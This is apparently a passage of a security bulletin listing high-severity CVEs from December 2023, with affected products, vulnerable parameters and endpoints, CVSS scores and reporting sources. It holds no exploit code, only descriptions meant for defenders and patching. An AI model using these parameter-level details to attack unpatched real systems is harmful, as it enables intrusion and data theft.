projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'fdid' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45118 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'n' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45119 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'qid' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45120 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'desc' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45121 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'name' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45122 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'right' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45123 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'tag' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45124 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'time' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45125 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'total' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45126 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'wrong' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45127 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_matrimonial_project | Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'filename' attribute of the 'pic3' multipart parameter of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-46791 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'psd' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48685 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'user' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48686 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'from' parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48687 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'to' parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48688 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'byname' parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48689 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'bynum' parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48690 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_id' parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48716 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_name' parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48717 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_name' parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48718 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'roll_no' parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48719 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'password' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48720 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_name' parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48722 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'rno' parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48723 help@fluidattacks.com help@fluidattacks.com |
redpanda -- redpanda | Redpanda before 23.1.21 and 23.2.x before 23.2.18 has missing authorization checks in the Transactions API. | 2023-12-18 | 9.8 | CVE-2023-50976 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
rmountjoy92 -- dashmachine | A vulnerability classified as problematic was found in rmountjoy92 DashMachine 0.5-4. Affected by this vulnerability is an unknown functionality of the file /settings/save_config of the component Config Handler. The manipulation of the argument value_template leads to code injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248257 was assigned to this vulnerability. | 2023-12-17 | 9.8 | CVE-2023-6899 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
rmountjoy92 -- dashmachine | A vulnerability, which was classified as critical, has been found in rmountjoy92 DashMachine 0.5-4. Affected by this issue is some unknown functionality of the file /settings/delete_file. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-248258 is the identifier assigned to this vulnerability. | 2023-12-17 | 9.1 | CVE-2023-6900 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
shenzen_libituo_technology_co.,_ltd -- lbt-t300-t310_firmware | Shenzhen Libituo Technology Co., Ltd LBT-T300-T310 v2.2.2.6 was discovered to contain a buffer overflow via the ApCliEncrypType parameter at /apply.cgi. | 2023-12-15 | 9.8 | CVE-2023-50469 cve@mitre.org |
silabs -- gecko_software_development_kit | An unvalidated input in a library function responsible for communicating between secure and non-secure memory in Silicon Labs TrustZone implementation allows reading/writing of memory in the secure region of memory from the non-secure region of memory. | 2023-12-15 | 9.1 | CVE-2023-4020 product-security@silabs.com product-security@silabs.com |
softnext -- mail_sqr_expert | Softnext Mail SQR Expert is an email management platform, it has insufficient filtering for a special character within a spcific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks, to execute arbitrary system command, manipulate system or disrupt service. | 2023-12-15 | 8 | CVE-2023-48380 twcert@cert.org.tw |
softnext -- mail_sqr_expert | Softnext Mail SQR Expert has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. | 2023-12-15 | 7.5 | CVE-2023-48378 twcert@cert.org.tw |
solarwinds -- access_rights_manager | Sensitive data was added to our public-facing knowledgebase that, if exploited, could be used to access components of Access Rights Manager (ARM) if the threat actor is in the same environment. | 2023-12-21 | 7.6 | CVE-2023-40058 psirt@solarwinds.com |
sourcecodester -- best_courier_management_system | A vulnerability classified as critical has been found in SourceCodester Best Courier Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248256. | 2023-12-17 | 9.8 | CVE-2023-6898 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
starnight -- micro_http_server | In MicroHttpServer (aka Micro HTTP Server) through 4398570, _ReadStaticFiles in lib/middleware.c allows a stack-based buffer overflow and potentially remote code execution via a long URI. | 2023-12-17 | 9.8 | CVE-2023-50965 cve@mitre.org cve@mitre.org |
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the sysScheduleRebootSet function. | 2023-12-20 | 9.8 | CVE-2023-50983 cve@mitre.org cve@mitre.org |
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the ip parameter in the spdtstConfigAndStart function. | 2023-12-20 | 9.8 | CVE-2023-50984 cve@mitre.org cve@mitre.org |
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the lanGw parameter in the lanCfgSet function. | 2023-12-20 | 9.8 | CVE-2023-50985 cve@mitre.org cve@mitre.org |
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysLogin function. | 2023-12-20 | 9.8 | CVE-2023-50986 cve@mitre.org cve@mitre.org |
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysTimeInfoSet function. | 2023-12-20 | 9.8 | CVE-2023-50987 cve@mitre.org cve@mitre.org |
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the bandwidth parameter in the wifiRadioSetIndoor function. | 2023-12-20 | 9.8 | CVE-2023-50988 cve@mitre.org cve@mitre.org |
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the pingSet function. | 2023-12-20 | 9.8 | CVE-2023-50989 cve@mitre.org cve@mitre.org |
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the rebootTime parameter in the sysScheduleRebootSet function. | 2023-12-20 | 9.8 | CVE-2023-50990 cve@mitre.org cve@mitre.org |
tenda -- i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a stack overflow via the ip parameter in the setPing function. | 2023-12-20 | 9.8 | CVE-2023-50992 cve@mitre.org cve@mitre.org |
tongda -- tongda_office_anywhere | A vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-16 | 9.8 | CVE-2023-6885 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
totolink -- a7100ru_firmware | A vulnerability, which was classified as critical, was found in Totolink A7100RU 7.4cu.2313_B20191024. Affected is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag with the input ie8 leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-18 | 9.8 | CVE-2023-6906 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
tutao -- tutanota | Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the `file:` URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as `ftp:`, `smb:`, etc. which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim's computer. Version 3.118.2 contains a patch for this issue. | 2023-12-15 | 9.3 | CVE-2023-46116 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
u-blox -- toby-l2 | A flaw in the input validation in TOBY-L2 allows a user to execute arbitrary operating system commands using specifically crafted AT commands. This vulnerability requires physical access to the serial interface of the module or the ability to modify the system or software which uses its serial interface to send malicious AT commands. Exploitation of the vulnerability gives full administrative (root) privileges to the attacker to execute any operating system command on TOBY-L2 which can lead to modification of the behavior of the module itself as well as the components connected with it (depending on its rights on other connected systems). It can further provide the ability to read system level files and hamper the availability of the module as well.. This issue affects TOBY-L2 series: TOBY-L200, TOBY-L201, TOBY-L210, TOBY-L220, TOBY-L280. | 2023-12-20 | 7.6 | CVE-2023-0011 vulnerability@ncsc.ch |
uffizio -- gps_tracker | A Remote Code Execution vulnerability exist in Uffizio's GPS Tracker all versions. The web server can be compromised by uploading and executing a web/reverse shell. An attacker could then run commands, browse system files, and browse local resources | 2023-12-16 | 9.8 | CVE-2020-17485 cve@mitre.org cve@mitre.org |
uffizio -- gps_tracker | An improper access control vulnerability exists in Uffizio's GPS Tracker all versions that lead to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed. | 2023-12-16 | 7.5 | CVE-2020-17483 cve@mitre.org cve@mitre.org |
unrealircd -- unrealircd | A buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms. | 2023-12-16 | 7.5 | CVE-2023-50784 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
wangmarket -- wangmarket | A vulnerability was found in xnx3 wangmarket 6.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component Role Management Page. The manipulation leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248246 is the identifier assigned to this vulnerability. | 2023-12-17 | 9.8 | CVE-2023-6886 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
wasmer_io -- wasmer | Wasmer is a WebAssembly runtime that enables containers to run anywhere: from Desktop to the Cloud, Edge and even the browser. Wasm programs can access the filesystem outside of the sandbox. Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem. This vulnerability has been patched in version 4.2.4. | 2023-12-22 | 8.4 | CVE-2023-51661 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
web-soudan -- mw_wp_form | The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. | 2023-12-16 | 9.8 | CVE-2023-6559 security@wordfence.com security@wordfence.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Zendrop Zendrop - Global Dropshipping. This issue affects Zendrop - Global Dropshipping: from n/a through 1.0.0. | 2023-12-20 | 10 | CVE-2023-25970 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin - JobWP. This issue affects WordPress Job Board and Recruitment Plugin - JobWP: from n/a through 2.0. | 2023-12-20 | 10 | CVE-2023-29384 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in Phpbits Creative Studio Genesis Simple Love. This issue affects Genesis Simple Love: from n/a through 2.0. | 2023-12-20 | 10 | CVE-2023-49772 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in Tim Brattberg BCorp Shortcodes. This issue affects BCorp Shortcodes: from n/a through 0.23. | 2023-12-20 | 10 | CVE-2023-49773 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6. | 2023-12-21 | 10 | CVE-2023-49778 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in WooRockets Corsa. This issue affects Corsa: from n/a through 1.5. | 2023-12-20 | 9.9 | CVE-2023-23970 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Themely Theme Demo Import. This issue affects Theme Demo Import: from n/a through 1.1.1. | 2023-12-20 | 9.1 | CVE-2023-28170 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Olive Themes Olive One Click Demo Import. This issue affects Olive One Click Demo Import: from n/a through 1.1.1. | 2023-12-20 | 9.1 | CVE-2023-29102 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in AmaderCode Lab Dropshipping & Affiliation with Amazon. This issue affects Dropshipping & Affiliation with Amazon: from n/a through 2.1.2. | 2023-12-20 | 9.9 | CVE-2023-31215 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates). This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.65. | 2023-12-20 | 9.9 | CVE-2023-31231 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in xtemos WoodMart - Multipurpose WooCommerce Theme. This issue affects WoodMart - Multipurpose WooCommerce Theme: from n/a through 1.0.36. | 2023-12-21 | 9.8 | CVE-2023-32242 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Daniel Söderström / Sidney van de Stouwe Subscribe to Category. This issue affects Subscribe to Category: from n/a through 2.7.4. | 2023-12-20 | 9.3 | CVE-2023-32590 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.40. | 2023-12-20 | 9.9 | CVE-2023-33318 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in WPChill Download Monitor. This issue affects Download Monitor: from n/a through 4.8.3. | 2023-12-20 | 9.9 | CVE-2023-34007 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Akshay Menariya Export Import Menus. This issue affects Export Import Menus: from n/a through 1.8.0. | 2023-12-20 | 9.9 | CVE-2023-34385 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in realmag777 HUSKY - Products Filter for WooCommerce Professional. This issue affects HUSKY - Products Filter for WooCommerce Professional: from n/a through 1.3.4.2. | 2023-12-20 | 9.8 | CVE-2023-40010 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Premio Folders - Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager. This issue affects Folders - Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager: from n/a through 2.9.2. | 2023-12-20 | 9.1 | CVE-2023-40204 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Jeff Starr User Submitted Posts - Enable Users to Submit Posts from the Front End. This issue affects User Submitted Posts - Enable Users to Submit Posts from the Front End: from n/a through 20230902. | 2023-12-20 | 9 | CVE-2023-45603 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5. | 2023-12-20 | 9.9 | CVE-2023-46149 audit@patchstack.com |
wordpress -- wordpress | Missing Authorization vulnerability in Clever plugins Delete Duplicate Posts allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Delete Duplicate Posts: from n/a through 4.8.9. | 2023-12-19 | 9.8 | CVE-2023-47754 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Porto Theme Porto Theme - Functionality. This issue affects Porto Theme - Functionality: from n/a before 2.12.1. | 2023-12-19 | 9.3 | CVE-2023-48738 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Spoonthemes Couponis - Affiliate & Submitting Coupons WordPress Theme. This issue affects Couponis - Affiliate & Submitting Coupons WordPress Theme: from n/a before 2.2. | 2023-12-19 | 9.8 | CVE-2023-49750 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Spoon themes Adifier - Classified Ads WordPress Theme. This issue affects Adifier - Classified Ads WordPress Theme: from n/a before 3.1.4. | 2023-12-20 | 9.3 | CVE-2023-49752 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6. | 2023-12-20 | 9.3 | CVE-2023-49776 audit@patchstack.com |
wordpress -- wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Symbiostock symbiostock. This issue affects Symbiostock: from n/a through 6.0.0. | 2023-12-20 | 9.1 | CVE-2023-49814 audit@patchstack.com |
wordpress -- wordpress | The Theme My Login 2FA WordPress plugin before 1.2 does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn't be too long, as the 2FA codes are 6 digits. | 2023-12-18 | 9.8 | CVE-2023-6272 contact@wpscan.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Webbjocke Simple Wp Sitemap. This issue affects Simple Wp Sitemap: from n/a through 1.2.1. | 2023-12-17 | 8.8 | CVE-2023-24380 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in Rocketgenius Inc. Gravity Forms. This issue affects Gravity Forms: from n/a through 2.7.3. | 2023-12-20 | 8.3 | CVE-2023-28782 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BestWebSoft Contact Form to DB by BestWebSoft - Messages Database Plugin For WordPress. This issue affects Contact Form to DB by BestWebSoft - Messages Database Plugin For WordPress: from n/a through 1.7.0. | 2023-12-20 | 8.5 | CVE-2023-29096 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Favethemes Houzez - Real Estate WordPress Theme. This issue affects Houzez - Real Estate WordPress Theme: from n/a before 2.8.3. | 2023-12-20 | 8.2 | CVE-2023-29432 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themefic Ultimate Addons for Contact Form 7. This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.1.23. | 2023-12-20 | 8.5 | CVE-2023-30495 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CreativeMindsSolutions CM Popup Plugin for WordPress. This issue affects CM Popup Plugin for WordPress: from n/a through 1.5.10. | 2023-12-20 | 8.5 | CVE-2023-30750 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Foxskav Easy Bet. This issue affects Easy Bet: from n/a through 1.0.2. | 2023-12-20 | 8.1 | CVE-2023-31092 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CrawlSpider SEO Change Monitor - Track Website Changes. This issue affects SEO Change Monitor - Track Website Changes: from n/a through 1.2. | 2023-12-20 | 8.5 | CVE-2023-33209 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Tagbox Tagbox - UGC Galleries, Social Media Widgets, User Reviews & Analytics. This issue affects Tagbox - UGC Galleries, Social Media Widgets, User Reviews & Analytics: from n/a through 3.1. | 2023-12-18 | 8.8 | CVE-2023-33214 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Alex Raven WP Report Post allows SQL Injection. This issue affects WP Report Post: from n/a through 2.1.2. | 2023-12-18 | 8.8 | CVE-2023-34168 audit@patchstack.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Square. This issue affects WooCommerce Square: from n/a through 3.8.1. | 2023-12-20 | 8.1 | CVE-2023-35876 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in Themesflat Themesflat Addons For Elementor. This issue affects Themesflat Addons For Elementor: from n/a through 2.0.0. | 2023-12-19 | 8.3 | CVE-2023-37390 audit@patchstack.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce GoCardless. This issue affects GoCardless: from n/a through 2.5.6. | 2023-12-20 | 8.2 | CVE-2023-37871 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in UX-themes Flatsome | Multi-Purpose Responsive WooCommerce Theme. This issue affects Flatsome | Multi-Purpose Responsive WooCommerce Theme: from n/a through 3.17.5. | 2023-12-20 | 8.3 | CVE-2023-40555 audit@patchstack.com |
wordpress -- wordpress | The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. | 2023-12-18 | 8.8 | CVE-2023-4311 contact@wpscan.com |
wordpress -- wordpress | Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in TienCOP WP EXtra allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects WP EXtra: from n/a through 6.2. | 2023-12-19 | 8.8 | CVE-2023-46212 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in AdFoxly AdFoxly - Ad Manager, AdSense Ads & Ads.Txt. This issue affects AdFoxly - Ad Manager, AdSense Ads & Ads.Txt: from n/a through 1.8.5. | 2023-12-18 | 8.8 | CVE-2023-46617 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Master slider Master Slider Pro allows SQL Injection. This issue affects Master Slider Pro: from n/a through 3.6.5. | 2023-12-18 | 8.8 | CVE-2023-47506 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 2.0.3. | 2023-12-18 | 8.8 | CVE-2023-47787 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Canada Post Shipping Method. This issue affects Canada Post Shipping Method: from n/a through 2.8.3. | 2023-12-18 | 8.8 | CVE-2023-47789 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Saint Systems Disable User Login. This issue affects Disable User Login: from n/a through 1.3.7. | 2023-12-18 | 8.8 | CVE-2023-47806 audit@patchstack.com |
wordpress -- wordpress | Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Roland Barker, xnau webdesign Participants Database allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects Participants Database: from n/a through 2.5.5. | 2023-12-19 | 8.8 | CVE-2023-48751 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.4. | 2023-12-18 | 8.8 | CVE-2023-48755 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Crocoblock JetElements For Elementor. This issue affects JetElements For Elementor: from n/a through 2.6.13. | 2023-12-18 | 8.8 | CVE-2023-48762 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in SVGator SVGator - Add Animated SVG Easily. This issue affects SVGator - Add Animated SVG Easily: from n/a through 1.2.4. | 2023-12-18 | 8.8 | CVE-2023-48766 audit@patchstack.com |
